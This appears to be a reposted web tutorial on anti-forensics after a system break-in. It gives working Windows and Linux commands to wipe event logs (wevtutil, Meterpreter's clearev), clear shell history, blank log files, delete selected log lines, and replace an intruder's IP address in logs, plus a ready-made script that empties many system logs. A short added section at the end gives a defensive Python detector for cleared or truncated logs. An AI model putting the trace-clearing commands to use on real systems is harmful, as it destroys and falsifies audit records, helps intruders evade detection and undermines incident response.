What is the way to clean traces on windows and linux?

WBOY
Release: 2023-05-19 19:17:06

1. Overview:

Once penetration is complete, an attacker clears the traces of the attack in order to reduce the probability of being discovered and traced back.

2. Windows

Manually delete logs when you have Remote Desktop access:

Start - Programs - Administrative Tools - Computer Management - System Tools - Event Viewer - Clear Log

Clearing from the command line with the wevtutil tool:

wevtutil el              :: list the names of all logs on the system
wevtutil cl system       :: clear the System log
wevtutil cl application  :: clear the Application log
wevtutil cl security     :: clear the Security log

Meterpreter has a built-in log-clearing command:

clearev    (clears the Windows Application, System and Security logs)

Clear Recent items:

Either open C:\Users\Administrator\Recent directly and delete everything in it, or run the following at the command line:

del /f /s /q "%userprofile%\Recent\*.*"

3. Linux

Clear command history

history -r          # delete the current session's history
history -c          # delete all command history held in memory
rm ~/.bash_history  # delete the history file
HISTSIZE=0          # stop the shell from keeping history

Executing commands without writing them to the shell history: open a file in vim and run the command from inside it:

:set history=0    " turn off vim's command-line history
:!command         " run the command from inside vim

Linux log files

/var/run/utmp       records users currently logged in
/var/log/wtmp       records all user logins and logouts
/var/log/lastlog    records each user's last login time
/var/log/btmp       records failed login attempts
/var/log/auth.log   records operations that required authentication
/var/log/secure     records security-related log messages
/var/log/maillog    records mail-related log messages
/var/log/messages   records system messages and error logs after boot
/var/log/cron       records scheduled task (cron) log messages
/var/log/spooler    records UUCP and news device log messages
/var/log/boot.log   records daemon start and stop messages

Completely empty a log file

cat /dev/null > filename
: > filename
> filename
echo "" > filename
echo > filename

Targeted deletion inside a log file

# delete the current day's entries (replace DATE with the date string as it appears in the log)
sed -i '/DATE/d' filename

Tamper with the log file

# replace every occurrence of the IP 170.170.64.17 with 127.0.0.1
sed -i 's/170\.170\.64\.17/127.0.0.1/g' filename

One-click clearing script:

#!/usr/bin/bash
echo > /var/log/syslog
echo > /var/log/messages
echo > /var/log/httpd/access_log
echo > /var/log/httpd/error_log
echo > /var/log/xferlog
echo > /var/log/secure
echo > /var/log/auth.log
echo > /var/log/user.log
echo > /var/log/wtmp
echo > /var/log/lastlog
echo > /var/log/btmp
echo > /var/run/utmp
rm ~/.bash_history
history -c
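As an added example from the defender's side (not part of the original article), a small Python detector for the two kinds of clearing shown above: the Windows wevtutil/clearev commands cause the Event Log service to write records 1102 (Security log cleared) and 104 (System or Application log cleared) from the Microsoft-Windows-Eventlog provider, and the Linux truncation and rm commands leave a log file that shrank while keeping its inode, or that is gone entirely. The event records, inode numbers and sizes below are constructed sample data.

```python
from dataclasses import dataclass

# Event IDs the Event Log service writes when a channel is cleared;
# wevtutil cl and Meterpreter's clearev both trigger them.
CLEARED_EVENT_IDS = {1102: "Security log cleared", 104: "System/Application log cleared"}

def windows_cleared_events(events):
    """Return (event, description) for records showing a cleared log.
    `events` are dicts with 'Provider'/'EventID' keys (parsed EVTX export)."""
    return [(ev, CLEARED_EVENT_IDS[ev["EventID"]]) for ev in events
            if ev.get("Provider") == "Microsoft-Windows-Eventlog"
            and ev.get("EventID") in CLEARED_EVENT_IDS]

@dataclass(frozen=True)
class Snapshot:
    inode: int  # os.stat(path).st_ino on a live host
    size: int   # os.stat(path).st_size

def linux_truncations(baseline, current):
    """Compare {path: Snapshot} maps taken at two times. Logs only grow unless
    rotated: same inode but smaller means truncated in place (`echo > file`,
    `: > file`); a missing file means removed (`rm ~/.bash_history`)."""
    findings = {}
    for path, before in baseline.items():
        after = current.get(path)
        if after is None:
            findings[path] = "missing (deleted)"
        elif after.size < before.size and after.inode == before.inode:
            findings[path] = f"truncated in place ({before.size} -> {after.size} bytes)"
        elif after.size < before.size:
            findings[path] = "replaced by a smaller file (rotation or rewrite; verify)"
    return findings

# Constructed sample data, not real telemetry.
SAMPLE_EVENTS = [
    {"Provider": "Microsoft-Windows-Security-Auditing", "EventID": 4624, "User": "alice"},
    {"Provider": "Microsoft-Windows-Eventlog", "EventID": 1102, "User": "Administrator"},
    {"Provider": "Microsoft-Windows-Eventlog", "EventID": 104, "Channel": "System"},
]
SAMPLE_BASELINE = {"/var/log/secure": Snapshot(81234, 40960),
                   "/var/log/wtmp": Snapshot(81250, 23040),
                   "/root/.bash_history": Snapshot(9001, 1200)}
SAMPLE_CURRENT = {"/var/log/secure": Snapshot(81234, 0),   # echo > /var/log/secure
                  "/var/log/wtmp": Snapshot(81250, 23424)}  # grew normally
if __name__ == "__main__":
    for ev, why in windows_cleared_events(SAMPLE_EVENTS):
        print(f"Windows: {why}: {ev}")
    for path, why in linux_truncations(SAMPLE_BASELINE, SAMPLE_CURRENT).items():
        print(f"Linux: {path}: {why}")
```

On a live host the Snapshot values come from os.stat() at two points in time; forwarding logs to a remote collector as they are written is what makes in-place truncation recoverable rather than merely detectable.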

Source: yisu.com